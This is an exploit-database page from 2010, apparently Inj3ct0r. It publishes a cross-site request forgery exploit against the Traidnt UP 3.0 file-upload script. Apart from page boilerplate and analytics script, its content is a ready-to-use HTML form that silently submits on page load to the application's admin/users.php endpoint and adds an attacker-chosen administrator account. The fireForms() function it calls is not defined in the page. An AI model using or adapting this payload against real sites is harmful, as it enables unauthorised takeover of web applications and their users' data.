[webapps / 0day] - Traidnt UP - Cross-Site Request Forgery A
Posted on 24 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Traidnt UP - Cross-Site Request Forgery Add Admin Account | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 24 Sep 2010 | Exploit category: webapps / 0day | Exploit author: John Johnz | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================= Traidnt UP - Cross-Site Request Forgery Add Admin Account ========================================================= # Exploit Title: Traidnt UP - CSRF Add Admin Account # Date: 24-09-2010 # Author: G0D-F4Th3r # Software Link: http://www.traidnt.net # Software Download: http://traidntup.googlecode.com/files/Traidnt%20up%20V3.0.zip # Version: 3.0 #######################Exploit####################################### <html> <body onload="javascript:fireForms()"> <form method="POST" name="form0" action=" http://www.site.com/[path]/admin/users.php?do=addnew"> <input type="hidden" name="name" value="admin2"/> <input type="hidden" name="password" value="123456"/> <input type="hidden" name="email" value="mail@mail.com"/> <input type="hidden" name="birthdate" value="1985"/> <input type="hidden" name="country" value="Saudi Arabia"/> <input type="hidden" name="group" value="1"/> </form> </body> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-24]</pre></body></html>